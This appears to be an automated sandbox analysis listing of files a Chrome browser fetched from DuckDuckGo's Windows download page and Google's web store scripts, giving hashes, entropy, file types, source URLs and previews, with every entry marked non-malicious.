                                                                                                                                                            Preview:.<?xml version="1.0" encoding="utf-8"?>..<AppInstaller...Uri="https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/installer/funnel_home___details/DuckDuckGo.appinstaller"...Version="0.90.3.0" xmlns="http://schemas.microsoft.com/appx/appinstaller/2017/2">...<MainBundle....Name="DuckDuckGo.DesktopBrowser"....Version="0.90.3.0"....Publisher="CN=&quot;Duck Duck Go, Inc.&quot;, OU=Engineering, O=&quot;Duck Duck Go, Inc.&quot;, L=Paoli, S=Pennsylvania, C=US, SERIALNUMBER=5019303, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US"....Uri="https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle" />..</AppInstaller> ..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):30094
                                                                                                                                                            Entropy (8bit):5.013087665369252
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:uyRugOK9TnMtqGKhJzQ6M58RXE9Ly9PkR2TdhiQ7Ytu5oKp:bRugOK9TMtrEdc2VL5Np
                                                                                                                                                            MD5:EF7D69259373A96A9865F6F88652B425
                                                                                                                                                            SHA1:CC2A8D995AB6A1D0AF4AEB507A68484AFA625C4D
                                                                                                                                                            SHA-256:4B5986A20FFABD94AEAD03BBAF736EB7818999282E119A7B760C417D392C7CDD
                                                                                                                                                            SHA-512:2438FF2AA995C3CCBD89245585C062DAE22B0226D4D79790246C11104B83FF3CA0762210156406DE441726CD3F4F05C4604494B9CBEABF210DCAEF8193B1CEC4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/data/kMKb7Bj0jhFmsUIWJjIQE/index.json
                                                                                                                                                            Preview:{"pageProps":{"bootstrapTheme":false,"translations":{"locale":"en-US","messages":{"QTW1uT":[{"type":0,"value":"Add to "},{"type":1,"value":"browserName"}],"bDg6ew":[{"type":0,"value":"Got it"}],"KtTyL5":[{"type":0,"value":"Download DuckDuckGo Browser"}],"HDlAOk":[{"type":0,"value":"Add our free extension to block web trackers."}],"Vv1JV8":[{"type":0,"value":"Get our free browser for even more privacy."}],"X0KnmR":[{"type":0,"value":"Make DuckDuckGo your default search engine."}],"JxLz7W":[{"type":0,"value":"As per our privacy policy, we do not collect or share any personal information ourselves. All of this privacy protection happens on your device."}],"R2RXjF":[{"type":0,"value":"These browser permissions are used to add privacy protection on websites you visit by blocking hidden trackers, encrypting connections where possible, and by making DuckDuckGo your default search engine."}],"mcsUF6":[{"type":0,"value":"Free. Fast. Private. Get the DuckDuckGo browser for "},{"type":1,"value":"
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows icon resource - 2 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 32x32 with PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):2799
                                                                                                                                                            Entropy (8bit):7.887078814855564
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:p7gHKtGThWJwwehUaFvJcldUlpamPj1YMCMrpyiXQy+OvlwnoSdRIfUAYu1dxx3v:1aRhWJPeOev+deMmPj1PIkSpdyUFFvjq
                                                                                                                                                            MD5:0A362A1A0CF4CC6BC56D65DB8049DD6F
                                                                                                                                                            SHA1:EBFD1B824377525E1588719E935BF4B06349CDDF
                                                                                                                                                            SHA-256:D994F806B1E4225B50BE5AB681B2CECF845CC216A19A432D878CEA3CB815BAFD
                                                                                                                                                            SHA-512:9BC3349815F97884A92965F5936A7ABC4EE937232F305148BD6D791DE0D0199C51C5A314E6F4F5EFBCAC925A860C8DA4DA6E94472471F36DB7725CAF4B49AC8B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/favicon.ico
                                                                                                                                                            Preview:............ .y...&... .... .P........PNG........IHDR................a...@IDAT8...ML[.....}.......3l#+U.q.........>:......'O.:...bv0.0.K..ds&l.J....J.`......B..}}...f.............M..9..)*G=..g.r.SR.k..s....W................@....a..'.l..*c..b...z.....h[.q.S...s...6GF...J.]T.3._....D....z...)X.c....L......xo..U...j.x/jK..#.X.Y6}p..3..........X#.z....?>.l...V.....%......B..A.....=.N..4.X.BA2}..[.5._ .N.....n....cd..~+.k.=.ey....g..Z#.+.J....... .B{.qI.h&.......B..0..N&g"...,Sj.....5.R..g...DI.]U.K.V..%_.+.E.k..#..C....b.`S......]R....E..-.mA.(...:.wg3VA.8y.h.A0.`.On....!.(.&\.P..\..`f%W4..X..M..pV.X.~..!.v.p?x.h....pVu...B.lg*.U.Qq.o.......0...b.H..T.C.#..u..E.q.H.. .......33.,?.\0..a..Tw..3.O..._..J....YNf..u.m......X..6...\}.\q..x.......J.L...o.e..T...v....N.G.A.......'....7.p$.*h5.U...:_.......-..S...(.......m...[......N..]q..n......x.O..c.5.....V...o.=g._hW.....IEND.B`..PNG........IHDR... ... .....szz.....IDATX..._lS...?...?...!sYBYl..N.[..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 720 x 500, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):57621
                                                                                                                                                            Entropy (8bit):7.9521696353685725
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:XGl1ASeHHyeQhv7Cc4FQdikWqVPe14rmpq18jHusl6gpebDwRhc9HPuwzXT60wBp:27ASiyVlzxV8qrgLc9Hxj6kry3
                                                                                                                                                            MD5:574871BE4B5C92EF0461DAAE0789B4E7
                                                                                                                                                            SHA1:C51501309FB6B33C8F605DD59C6FAD4F58ACD731
                                                                                                                                                            SHA-256:B2C195A170D953446BCDAEB64B686069A2E95CBCB0DE8640FB11CF87C7FB6A26
                                                                                                                                                            SHA-512:AEB036D40BB7FC1BF422B5A82955365DA4E7E5F8DBF33C0563F7CEDE41FD63EA9CE5FA4F8A7166E90D216EF7160B2F6A8953F9BEE464B89946C261C6118CD84E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/backgrounds/homepage-btf-light.png
                                                                                                                                                            Preview:.PNG........IHDR.............#\......PLTE............................................................~..............}.....|.....{..}...........{..}..{..{..{..{..{.....{..{..{..{.........{..{..}.............|..{..{..{.......{....|....{...........|....|..{..|.........~..~.....|....~..~......~..|..............}..~.............................}..............................~................................................................................................................................................................................}......................................................................~...................................................................................k.......tRNS...........!4.$.*WSN..'-80.;.F".BJ?&.049,).=AEI...Y].....qLad..U.h.P....k.uR|..@..$x....n..-..1(.K...6..&"+.]......98H.3...QV.k.}F...;.W.E.B/k..v.q.....\...q.P.l...?..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2769
                                                                                                                                                            Entropy (8bit):7.9016613239114175
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:WGO9Jq9EFXLt41jUSya3uJ0WVGifErCr3GIIPmbA1ER7HYWRVhANSkIvHe6DKo29:O98OFXBwyKe0WVGawLED3KNGHE9
                                                                                                                                                            MD5:B93CB32AA29E53489F1615E1BFF5BB42
                                                                                                                                                            SHA1:3B858858B7B34FE56664EEB6FB2F3D200AE5A3AE
                                                                                                                                                            SHA-256:3BD380B6D4B042F3BDEC48E27612B03B72A51847568162A8CC02E31D0BDE80C9
                                                                                                                                                            SHA-512:7AB5B97C76E5827E1A2CD906D4EFC399BADEFCD8B13C42B18EC7885B830100C5367640C96915D44679D22A13DC60C17BF936CEA8B8254E8BCD2E4238E959DB0F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a....fIDATx..KV.8...~.zV..p..X..Y...Z.. .Q.C. ....{.X....V...Z....#9.-...{..?..tu.0..D".H$..D".H.P....HH".ts<.....G.k^+...,.i...#d,.@e^.9..b.x.<m.A.=...T.D......m....K:...?..i.1$.X'..........d..Q+d.4........!X$EXU}.CH......P..U..%...&.A....J.Nf.J....Y.u...K!/.KA>.y2....a)...`......`...0..c$...!..8..@..........C...c..28.. ...%SC.K...1..R^0..!..9....%....`......k..?.....!.R4.I1......a.)....y..0.. AX.f.......Kx"MS..s\\\l?.y.....s.$.y<.f3.o*.,......3..qtt..d..rY\.#.W...L...<Z.P...J*."....3.yyy)...(.F..~Ba.{.<~.../.g'..F>...|.7....}...L$....~.B.....M............LD..w>.'..j4R.......[...<)I..d..OJ..*.".....P.oT...W..F.c..46U.d.Q5..........(.;......j...;"...o...".X.?|...]T....o..}...M.<.\.Y.!m...M..@g....+.....8Jc.r.......X.[`L.^..F...|...?.....Jy.4......F..ai.M....N......3. .:@.jzA....#@..T...>>>....i.E....FQ..g...|....d.0..T...bQ..<.j.4(.(._.N....M. .H.?*....g.Z..,
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (29585), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):29585
                                                                                                                                                            Entropy (8bit):5.3894735603863015
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:hFCcSTTuOvWpmXNuQHrqTkssSxcAuUnRnPKpRLFQqpy4JQh6OMvLddn47W4:yW4pr5ssSZ/ORpQqpy41ZvTn47W4
                                                                                                                                                            MD5:B3F31042BA387037C853EF354700491C
                                                                                                                                                            SHA1:9FF160C816E4EB8E9320EEEDF0FC3167F63A3021
                                                                                                                                                            SHA-256:085730C8A612D84E53CEAAC1498F6DDB50C95CCE47D439A285D380181E2C6A70
                                                                                                                                                            SHA-512:556B598C8620947D74D6A4CEA364F3B7187D65046DD9F0DAAA66CE083E7FAFC50F09483469DBA718920E4E4F62446AC4A66262EABA0979E9049650B469424179
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/79567-e254aebee0b28943.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[79567],{17732:function(e,l,t){"use strict";t.d(l,{Z:function(){return g}});var a=t(59499),i=t(4730),n=t(61760),r=t(94184),o=t.n(r),c=t(67294),s=t(76743),d=(t(44600),t(70223)),p=t.n(d),f=t(90806),u=t(85893),v=["isOpen","onDismiss","children","overlayClassName","contentClassName","dangerouslyBypassScrollLock","closeOnOverlayClick","dismissable"];function h(e,l){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);l&&(a=a.filter((function(l){return Object.getOwnPropertyDescriptor(e,l).enumerable}))),t.push.apply(t,a)}return t}function m(e){for(var l=1;l<arguments.length;l++){var t=null!=arguments[l]?arguments[l]:{};l%2?h(Object(t),!0).forEach((function(l){(0,a.Z)(e,l,t[l])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):h(Object(t)).forEach((function(l){Object.defineProperty(e,l,Object.getOwnPropertyDescriptor(t,l))}))}return e}function g(e){va
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3001
                                                                                                                                                            Entropy (8bit):4.714848768159009
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:TMRlHa9kgrrsCWlK1P3Fs7geAEHxvV2brUEzf7nv4ezLAbJJROnacm5dGnb/fjsC:gRlMkhgtkgDA2bgEHnvtQJJRDcm5s/fH
                                                                                                                                                            MD5:89145F55DF634A09980D63C372B530A4
                                                                                                                                                            SHA1:2C03EA817E643B5884F61BF43C2CA791271D1CBF
                                                                                                                                                            SHA-256:DC40F755F049A611620BD5354B9DC5B097E45E80232CD467364E415A83064A81
                                                                                                                                                            SHA-512:4B39096531CC7E62744A99B9F0BFEDB8119A268DB4AE3B4049EB07B6475F0D75B40C2000A0DCCABFD149974D0E06474BF7CCD28B40A826626D2756C9BE6B723D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:<svg width="375" height="359" viewBox="0 0 375 359" fill="none" xmlns="http://www.w3.org/2000/svg">.<mask id="mask0_2_6694" style="mask-type:alpha" maskUnits="userSpaceOnUse" x="0" y="0" width="373" height="346">.<rect width="372.627" height="345.597" fill="#C4C4C4"/>.</mask>.<g mask="url(#mask0_2_6694)">.<path fill-rule="evenodd" clip-rule="evenodd" d="M158.555 227.495L181.644 259.69H183.431V249.57H197.606V216.457H205.706V199.9L221.91 188.858V205.419H227.985V249.57H240.136V236.327H258.361V208.178L266.465 202.659L274.565 208.178V230.254H278.615V186.098L302.916 202.659V214.347H313.041V174.574L321.145 169.055L329.245 174.574V229.445H335.32V212.67H357.596V238.532H361.646V197.69H367.721V179.476H374.609L385.95 164.022L397.291 179.476H404.176V197.69H410.251V213.697H416.326V186.098L424.426 180.579L432.527 186.098V213.697H436.58V253.986H444.68V213.697H448.73L458.856 199.9L468.981 213.697H473.031V241.292H485.182V197.136L501.385 208.178V221.976H509.486V241.292L519.611 227.495L542.699 259.69H558.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (7774)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):194723
                                                                                                                                                            Entropy (8bit):5.632028411816484
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:rycYAkumIFhWC5COUJmoY0yRt+/JuTyYkNoZ:rzkEFhjCJGtmY8K
                                                                                                                                                            MD5:7A082657CFFA8A94A5E9F2196BDDCB5D
                                                                                                                                                            SHA1:08DFB829E194D114A5A2820962DC8E3BCDA182D1
                                                                                                                                                            SHA-256:C2BB2202EFCC887484212CD43D414132E45407883872D763313E918F6FDFB2A7
                                                                                                                                                            SHA-512:F18F15B95DA5EDDF1B1FCB95B89FB7957DC13D43ECBA69DBF84EE8C80A92A1CDEAB7AA243BC97FDF62F315C5EA82534D40EF0EAA8F6675D31D861C3B67A76F10
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-chrome-webstore/_/js/k=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.en_US.yIPKtUt8CNQ.es5.O/ck=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.GtGb1vgdaaY.L.B1.O/am=SAcGA2YB/d=1/exm=A1yn5d,A7fCU,BBI74,BVgquf,CfLNpd,DNlSjf,EEDORb,EFQ78c,FdMhB,Fu7Bjd,IZT63,JNoxi,KUM7Z,L1AAkb,LEikZe,M0x0ie,MI6k7c,MT4Hub,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,PrPYRd,QIhFr,QvLWAb,RMhBfe,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,UkbOSe,Ulmmrd,V3dDOb,V9amgb,XVMNvd,Xi0ENb,YA1iG,YYmHzb,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,duFQFc,e5qFLc,ebZ3mb,fKUV3e,gIl2M,gychg,h4ilFc,hKSk3e,hc6Ubd,kBpGk,kWgXee,kjKdXe,lazG7b,lsjVmc,lwddkf,mI3LFb,mUxuKd,mdR7q,n73qwf,o2G9me,ovKuLd,p8L0ob,pjICDe,pw70Gc,qv5bsb,ri2s0b,s39S4,sI9bWe,w9hDv,ws9Tlc,xQtZb,xUdipf,yDVVkb,zKiH5d,zbML3c,zr1jrb/excm=_b,_tp,itemdetailview/ed=1/wt=2/ujg=1/rs=AEP720Jfe38t-OWhOSrlVq2pOwWCRGJ40A/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:YA1iG;xqZiqf:BBI74;yEQyxe:p8L0ob;yxTchf:KUM7Z;zxnPse:duFQFc/m=sQ8PT,tw4SJc,dsBBae,LBaJxb,HsQQib,cephkf,i8oNZb,RiINWe,MH0hJe,AWpPDd,QVysJe,rm99Nc,ZvHseb,PIVayb,bZ0mod,OhgRI,VBl5Ff,R6rk4,O626Fe,ECBKud,KfQkxf,w9C4d,LcrBLd"
                                                                                                                                                            Preview:"use strict";_F_installCss(".rtaOSd-AznF2e-ZMv3u.rtaOSd-AznF2e-ZMv3u{border-bottom:var(--gm3-tabs-secondary-divider-height,1px) solid var(--gm3-tabs-secondary-divider-color,var(--gm3-sys-color-surface-variant,#e1e3e1))}.rtaOSd-AznF2e{min-width:90px;padding:0 24px;display:flex;flex:1 0 auto;justify-content:center;box-sizing:border-box;margin:0;border:none;outline:none;text-align:center;white-space:nowrap;text-transform:none;cursor:pointer;-webkit-appearance:none;width:auto;font-size:.875rem;z-index:unset;position:relative;background-color:var(--gm3-tabs-secondary-container-color,var(--gm3-sys-color-surface,#fff));border-radius:var(--gm3-tabs-secondary-container-shape,0);--gm3-focus-ring-inward-color:var(--gm3-tabs-secondary-focus-indicator-color,var(--gm3-sys-color-secondary,#00639b));--gm3-focus-ring-inward-offset:var(--gm3-tabs-secondary-focus-indicator-outline-offset,-3px);--gm3-focus-ring-inward-track-width:var(--gm3-tabs-secondary-focus-indicator-thickness,3px);--gm3-focus-ring-inw
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):8622
                                                                                                                                                            Entropy (8bit):4.827305743493031
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:QUfVqjBWlcHahlEfpudU4eIC1z/VwDnFzyrxeHSa4kRKUFOb5+mx:pAXvf4lCdVwxX4kR9FOb5p
                                                                                                                                                            MD5:F71227D4C1C59E6C8AEA3791A44F9B8A
                                                                                                                                                            SHA1:A8AC97DDBD38A9464359044020DA510ADDD5B18F
                                                                                                                                                            SHA-256:98D5D89D779B63E95EE80F43DABFD82241C7F827D000AA94F5B1C95F4827FD03
                                                                                                                                                            SHA-512:BCB1FA29C91C41FD34F90892AB5D103E0C5E009C224D0D3228007FD29F255B1A247E4E246572BC0DABC1CA576F5747F97CCF7E782A1F965D156D0AA3C94014A7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/backgrounds/about-fg-dark-md-lg.svg
                                                                                                                                                            Preview:<svg width="1044" height="591" viewBox="11 0 1022 591" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M466.483 473.074L498.52 517.748H501V503.706H520.67V457.758H531.91V434.783L554.394 419.461V442.441H562.824V503.706H579.684V485.329H604.974V446.27L616.218 438.612L627.458 446.27V476.903H633.078V415.632L666.798 438.612V454.831H680.847V399.641L692.092 391.983L703.332 399.641V475.78H711.762V452.503H742.671V488.39H748.291V431.717H756.721V406.444H766.279L782.015 385L797.752 406.444H807.305V431.717H815.735V453.929H824.165V415.632L835.405 407.974L846.645 415.632V453.929H852.269V509.834H863.509V453.929H869.129L883.179 434.783L897.229 453.929H902.849V492.219H919.709V430.948L942.193 446.27V465.416H953.433V492.219L967.483 473.074L999.52 517.748H1022V591H521H501H0V503.706H19.6699V457.758H30.9098V434.783L53.394 419.461V442.441H61.8239V503.706H78.6838V485.329H103.974V446.27L115.218 438.612L126.458 446.27V476.903H132.078V415.632L165.798 438.612V454.831H
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (340), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):340
                                                                                                                                                            Entropy (8bit):5.402081775975914
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:XzjbdHhjbzrgNugDU8FxkvV+3rWGY41Y5GQBDMiLmpgFVU9j9QGJvgETBRXyYd1L:fbjuugDU8FxAU711cDtmaUPvgETBRXyA
                                                                                                                                                            MD5:FA64B877DDFDF799013414C2ADDE1374
                                                                                                                                                            SHA1:5C5655170881C66984A68BA4F3372402FFBA78FD
                                                                                                                                                            SHA-256:6D154E7F1FD96A35A09D70198A8AFF29FB06F6A8824237382984C0B374ECA4DC
                                                                                                                                                            SHA-512:9ACCC57A0577B1F968EEEDD4192340F001CCE331D3845AD6A16639510DF1B2F8457FF28940163CF0D38B6E347EFEEFBEACC2369A3CC71A9D796EF0BCF41FBCEF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/pages/%5Blocale%5D/windows-e9460cf0c20fe9ca.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[328],{89663:function(n,_,u){(window.__NEXT_P=window.__NEXT_P||[]).push(["/[locale]/windows",function(){return u(79567)}])}},function(n){n.O(0,[41966,43965,49224,81125,67191,62242,49706,66556,79567,49774,92888,40179],(function(){return _=89663,n(n.s=_);var _}));var _=n.O();_N_E=_}]);
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):475
                                                                                                                                                            Entropy (8bit):5.182649695066859
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:ky5UF7h0O4D+6hnFmxRi7XgyqRUG8dkbRNced0:knNh0j6GnIPIQyRG8ercn
                                                                                                                                                            MD5:ABA9637A7189D53ACCE56FA3C7685348
                                                                                                                                                            SHA1:557FED3C8F984DF96847BB46706C516FD58386BC
                                                                                                                                                            SHA-256:1473CE38B8DD8330BBA45865271F49668AD6C1BB9B4C0E9EB90A4CE614CF87BE
                                                                                                                                                            SHA-512:B39454CF6F3E6AB7F75FA5169C78E9322EFA4D44A6E8E7E1CABDECE19BA70B4CC8478CC926C1845C151B629F4F8EA1FEE6BB7301115573A62C33A7E2376EF4EA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-chrome-webstore/_/js/k=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.en_US.yIPKtUt8CNQ.es5.O/ck=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.GtGb1vgdaaY.L.B1.O/am=SAcGA2YB/d=1/exm=A1yn5d,A7fCU,AWpPDd,BBI74,BVgquf,CfLNpd,DNlSjf,ECBKud,EEDORb,EFQ78c,FdMhB,Fu7Bjd,HsQQib,IZT63,JNoxi,KUM7Z,KfQkxf,L1AAkb,LBaJxb,LEikZe,LcrBLd,M0x0ie,MH0hJe,MI6k7c,MT4Hub,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O626Fe,O6y8ed,OTA3Ae,OhgRI,OmgaI,P6sQOc,PIVayb,PrPYRd,QIhFr,QVysJe,QvLWAb,Qy2cOb,R6rk4,RMhBfe,RiINWe,RqjULd,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,UkbOSe,Ulmmrd,V3dDOb,V9amgb,VBl5Ff,XVMNvd,Xi0ENb,YA1iG,YYmHzb,Z5uLle,ZDZcre,ZfAoz,ZvHseb,ZwDk9d,_b,_tp,aW3pY,aurFic,bZ0mod,byfTOb,cephkf,dsBBae,duFQFc,e5qFLc,ebZ3mb,fKUV3e,gIl2M,gychg,h4ilFc,hKSk3e,hc6Ubd,i8oNZb,kBpGk,kWgXee,kjKdXe,lazG7b,lsjVmc,lwddkf,mI3LFb,mUxuKd,mdR7q,n73qwf,o2G9me,ovKuLd,p8L0ob,pjICDe,pw70Gc,q0xTif,qv5bsb,ri2s0b,rm99Nc,s39S4,sI9bWe,sOXFj,sQ8PT,tw4SJc,w9C4d,w9hDv,ws9Tlc,xQtZb,xUdipf,yDVVkb,zKiH5d,zbML3c,zr1jrb/excm=_b,_tp,itemdetailview/ed=1/wt=2/ujg=1/rs=AEP720Jfe38t-OWhOSrlVq2pOwWCRGJ40A/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:YA1iG;xqZiqf:BBI74;yEQyxe:p8L0ob;yxTchf:KUM7Z;zxnPse:duFQFc/m=ld80Uc"
                                                                                                                                                            Preview:"use strict";this.default_ChromeWebStoreConsumerFeUi=this.default_ChromeWebStoreConsumerFeUi||{};(function(_){var window=this;.try{._.p("ld80Uc");.var t4=function(a){_.oC.call(this,a.Ha)};_.F(t4,_.oC);t4.Ea=_.oC.Ea;t4.prototype.Df=function(){return"ld80Uc"};t4.prototype.yf=function(){return!0};t4.prototype.Ff=function(){return _.r4};_.mC(_.FG,t4);_.bB.ld80Uc=_.JG;._.q();.}catch(e){_._DumpException(e)}.}).call(this,this.default_ChromeWebStoreConsumerFeUi);.// Google Inc..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 900 x 784, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):40423
                                                                                                                                                            Entropy (8bit):7.969430866014362
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:jXVXEY82uKgRWGEQE+WP+Sp0KmAm/EawKMydi8OFfhz1NRTuZGiP6kh:jHgE+W2m0Kg/EawK9TOFfhz1N1uZGiyM
                                                                                                                                                            MD5:153557C559EA2E10B8BC312CCE950DE5
                                                                                                                                                            SHA1:00D830AA06B8B357054636644A6E2B0B9F77090E
                                                                                                                                                            SHA-256:29AFD98499E84526FCFF99D94A773C134A85EAC2E7FF55AAFE0583EFDDE2D024
                                                                                                                                                            SHA-512:05A5DA886F4FFF7F71A9956EC88C0C21C2FAEEB763A384D94AFB914C0727D6A2880C1482AB507571EE21ED64D818992B0F3506D009BBC38DEC6496F7BB97214B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/desktop/email-protection-front-light.png
                                                                                                                                                            Preview:.PNG........IHDR.............Hg[\....PLTE...000 ................................................................................................mmm................................. !".....333_ch.X3"""Q2.9i....???...aaa......JJJXYZ........yyy<=?//0......tuu..........stv...JKL.......................sw{..........k......ppp......fgh..............kJ...VVV...R|.....y.~b...PPPnnn.............ZZZ......Fs.dhm~...x..hlq.............aC..b?.........Y;.~..LLL...^..lpuaej........nR..........Er.....f..n...............tVw..o..a>osx............x^................}b'..i...-tRNS........... "....$....7'.Q..te.~.S(...ro.....K.....JIDATx...............................r.q...(s.K.T[.%..\.Q?.V.R.&.vb.1..c.1..c.1..c.1.rY...YO.z...l.....j;.g.].....R{MY...x...s.s.?0@...C.9.\"jca-{.i.'..i].us..^,i..C.p.d.....w.3`...~Y.5....b-Z......I`.L.R.IH...x..Y.R.RU..8,.@?...2P...lN.m......Efv=..K....as++L(C.,...?f.._.e...._*..._.?...2.....3.3.T=l......J'...6.&..{.*...s.1.....x.o.rGt
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (932)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):242364
                                                                                                                                                            Entropy (8bit):5.6227459273242495
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:EDC+I7m7txsGM9cZOLAv9rjm1xvtPUaVASIAs/QKpUnjIYAU3FXuu:wI7mJNr9rjEVpIAs/TpUnjx
                                                                                                                                                            MD5:7B95EE7805AAE924411387A3D0929907
                                                                                                                                                            SHA1:F3F1C469AEEB8788626CC0644E448D9BC415BBDB
